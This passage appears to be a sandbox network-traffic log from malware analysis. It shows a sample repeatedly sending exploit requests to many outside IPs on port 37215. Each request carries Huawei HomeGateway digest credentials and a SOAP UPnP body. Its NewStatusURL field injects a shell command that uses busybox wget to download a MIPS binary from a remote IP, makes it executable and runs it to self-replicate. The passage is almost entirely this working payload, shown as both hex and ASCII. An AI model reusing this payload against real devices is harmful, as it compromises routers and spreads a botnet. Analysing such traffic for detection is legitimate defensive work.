                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2232192.168.2.2333406206.132.120.20737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576432943 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2233192.168.2.2354660181.2.21.13937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576812029 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2234192.168.2.2359134197.119.237.937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576812029 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2235192.168.2.235625441.2.137.6937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576824903 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2236192.168.2.233312841.150.0.5737215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576828003 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2237192.168.2.2333826157.46.134.14937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576901913 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2238192.168.2.2343294110.253.151.19837215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576901913 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2239192.168.2.235783041.26.184.19937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576946974 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2240192.168.2.2342542110.238.33.18937215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576946974 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
                                                        Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 72 6d 20 2d 72 66 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 74 61 6a 6d 61 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f [TRUNCATED]
                                                        Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(rm -rf /tmp/linuxxx; /bin/busybox wget -g 103.177.35.32 -l /tmp/linuxxx -r /tajma.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.tajma)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2241192.168.2.2350802197.214.2.25337215
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:13.576972961 CEST860OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept: */*
                                                        Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                        Content-Length: 491
